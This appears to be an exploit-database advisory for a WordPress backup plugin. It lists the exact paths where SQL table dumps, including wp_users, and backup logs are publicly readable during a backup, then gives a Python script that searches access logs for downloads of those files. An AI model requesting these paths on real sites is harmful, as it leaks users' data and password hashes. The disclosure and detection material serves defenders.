## https://sploitus.com/exploit?id=WPEX-ID:7AC217DB-F332-404B-A265-6DC86FE747B9
1) Run a backup of the site
2) Notice the following files are all publicly available while the site is being backed up:
./wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_links.sql
./wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_users.sql
./wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_termmeta.sql
./wp-content/plugins/backup-backup/includes/htaccess/bmi_logs_this_backup.log

(... the list is not exhaustive, virtually every table accessible to the site gets dumped in those log files ...)
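To check whether any of these files were actually fetched from a site, the access log can be searched for successful responses under the staging directory listed above. The following is an added example, not part of the original advisory or the plugin's code; it assumes Combined Log Format and a WordPress install served from the web root, and the sample log lines are constructed.

```python
import posixpath
import re
from collections import defaultdict
from urllib.parse import unquote

# Staging directory from the steps above. Assumption: WordPress is served from
# the web root, so "./wp-content/..." on disk maps to "/wp-content/..." in URLs.
STAGING = "/wp-content/plugins/backup-backup/includes/htaccess/"

# Assumption: Apache/nginx Combined Log Format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"[A-Z]+ (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def find_staging_downloads(lines):
    """Map client IP -> [(timestamp, path, bytes)] for staging files actually served."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["status"] not in ("200", "206"):
            continue  # unparsable line, or no file body returned (403, 404, ...)
        # Drop the query string, decode %xx, collapse "//" and "../" segments.
        path = unquote(m["path"].split("?", 1)[0])
        path = posixpath.normpath(re.sub(r"/+", "/", path))
        if path.startswith(STAGING) and path.endswith((".sql", ".log")):
            size = 0 if m["size"] == "-" else int(m["size"])
            hits[m["ip"]].append((m["ts"], path, size))
    return dict(hits)

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [12/Mar/2024:10:01:02 +0000] "GET /wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_users.sql HTTP/1.1" 200 48213 "-" "-"',
    '203.0.113.7 - - [12/Mar/2024:10:01:05 +0000] "GET /wp-content/plugins/backup-backup/includes/htaccess/bmi_logs_this_backup.log HTTP/1.1" 403 199 "-" "-"',
    '198.51.100.9 - - [12/Mar/2024:10:02:11 +0000] "GET /wp-content/plugins/backup-backup/includes/%68taccess/db_tables/wp_links.sql?x=1 HTTP/1.1" 206 1024 "-" "-"',
    '192.0.2.4 - - [12/Mar/2024:10:03:00 +0000] "GET /wp-content/uploads/logo.png HTTP/1.1" 200 5120 "-" "-"',
]

if __name__ == "__main__":
    for ip, rows in find_staging_downloads(SAMPLE).items():
        for ts, path, size in rows:
            print(f"{ip} [{ts}] {size} bytes {path}")
```

A 200 or 206 on a `.sql` file in this directory means table contents left the server; the byte count helps separate a full dump from a partial read.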